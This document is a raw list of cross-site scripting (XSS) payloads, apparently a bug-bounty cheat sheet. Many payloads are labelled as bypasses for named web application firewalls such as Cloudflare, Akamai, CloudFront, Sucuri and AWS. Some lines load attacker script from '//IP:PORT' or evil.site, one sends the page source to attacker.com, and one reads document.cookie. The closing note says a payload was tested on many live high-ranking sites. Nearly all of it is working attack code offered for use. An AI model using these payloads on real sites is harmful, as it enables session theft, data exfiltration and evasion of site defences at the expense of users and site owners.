"><img src onerror=alert(1)>
"/><img src=x onerror=alert(2);><!--
<--`<img/src=` onerror=alert(3)> --!>
" autofocus onfocus=alert(4) fragment="
" onclick=alert`5` fragment="
<details/open ontoggle=alert(6)>
<svg/onload=alert``>


<details/open ontoggle=%26%23x101;;alert`1`>


<script>setInterval(function(){d=document;z=d.createElement("script");z.src="//IP:PORT";d.body.appendChild(z)},0)</script>  ==> reverse Shell

＜img src⁼p onerror⁼＇prompt⁽1⁾＇﹥
＜script src=a／＞
＂onclick=＇prompt(1)＇


"><block%quote oncontextmenu%3Dconfirm(1)>Right click me</blockquote><!--
<--` <body/onload=&lt;!--&gt;&#10alert(1)> --!>
i\{\<\/\s\t\y\le\>\<\i\m\g\20\o\ne\r\r\o\r\=\'a\le\r\t\(\1\)\'\s\rc\=\'e\'\20\>{
<script src=data:,alert(1)>
https://brutelogic.com.br/xss.php/"><svg onload=alert(1)>?a=reader
x”</title><img src%3dx onerror%3dalert(1)>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
<dETAILS%0Aopen%0AonToGgle%0A=%0Aa=prompt,a() x>
<svg onunload=http://window.open('javascript:alert(1)')>

javascript:alert(1)
'-alert(1)-'
'-alert(1)//
\'-alert(1)//
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//
\u0027-confirm`1`-\u0027 
"; ||confirm('XSS') || "
'*prompt(1)*'
{{32*32}}
﹛﹛3+3﹜﹜
［［5+5］］

x");$=alert, $(1);//
""});});});alert(1);$('a').each(function(i){$(this).click(function(event){x({y
"])},alert(1));(function xss() {//
'?prompt`1`?'
" onmouseover=alert(/@darknetguy/)
" onclick=alert(1)//">click
" autofocus onfocus=alert(1) "
" onfocus=prompt(1) autofocus fragment="
" onfocus=prompt(1) onmouseover="confirm(1) " style="position:absolute;width:100%;height:100%;top:0;left:0;"
" onmousemove=alert(/@darknetguy/)//">Milad


"><svg onload=alert(1)>.gif
http://www.<svg/onload=confirm(1)>.com
"><svg/onload=confirm(1)>"@yahoo.com

<script>eval(location.hash.slice(2))</script>    and end of url ==> #alert("testtesttestets")

<script>
x='<%'
</script> %>/
alert(2)
</script>

/<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> ---> cloudflare {`XSS´} «byPASS»
/<svg%0Aonauxclick=0;[1].some(confirm)//



<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">   ===> send current page's source to attacker site


=[̕h+͓.＜script/src=//evil.site/poc.js>.͓̮̮ͅ=sW&͉̹̻͙̫̦̮̲͏̼̝̫́̕   ===> use < diffrent way


">'><details/open/ontoggle=confirm('XSS')>   ===> maybe WAF bypasser (Test it)


<object/data="javascript&colon;alert/**/(document.domain)">//   ===>  Bypass CloudFront WAF

%3c<aa+ONLOAD+href=javasONLOADcript:promptONLOAD(1)%3e ===> maybe WAF bypasser (Test it)

<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)">   ===>  maybe WAF bypasser (Test it)

"><input/onauxclick="[1].map(prompt)">   ==> Sucuri WAF XSS bypass 

<--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!>    ===> CloudFront XSS bypass

1'"><img/src/onerror=.1|alert``>   ===>  Cloudflare #XSS #Bypass via dot
<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;>
<select><noembed></select><script x=’a@b’a>y=’a@b’//a@b%0a\u0061lert(1)</script x>
<a+HREF=’%26%237javascrip%26%239t:alert%26lpar;document.domain)’>

<!--><svg onload=alert(1)-->    ===> bypass if comments are allowed

<sVg/oNloAd=”JaVaScRiPt:/**\/*\’/”\eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))”>
<iframe src=jaVaScrIpT:eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))>


<a href=”j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this[‘document’][‘cookie’]&rpar;”>X</a>  ==> Cloudflare Bypass 

javascript:”/*’/*`/* →<html \” onmouseover=/*&lt;svg/*/onload=alert()//> 

<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>    ===> Akamai waf bypass

</script><svg><script>alert(1)%0A-->   ===> It must land where JS syntax is not affected though
<link rel=import href='.&#47"><svg%20onload=alert(domain)>'>
<iframe src="javascript:alert(1)%%0D3C!--
<iframe src="javascript:alert(1)%%0D3C--




XSS'\x22"%22>4<%\u0022/* ===> locator!

<ScRiPt src=https://yoursite.com/XSS.js>

<style/onload=alert(0)>

%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)  ==> injecting into src attributes, you need a javascript URI payload

<!<script>alert(1)</script>   ===>  AWS WAF bypass

{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}  ==> cloudflare «XSS» payload to bypass protection

IE weird behavior:
<iframe id=element></iframe>
<script>
element.alert(1)
</script>

<</div>script</div>>alert()<</div>/script</div>>

<</div>script</div>>alert()<</div>/script</div>>

</ScRiPt><img src=something onauxclick="new Function `al\ert\`xss\``">
#Akamai #Bypass #XSS #BugBounty
Found a working #xss payload after a brainstorming for a long #time. 
#Tested in many sites with alexa ranking below #1000

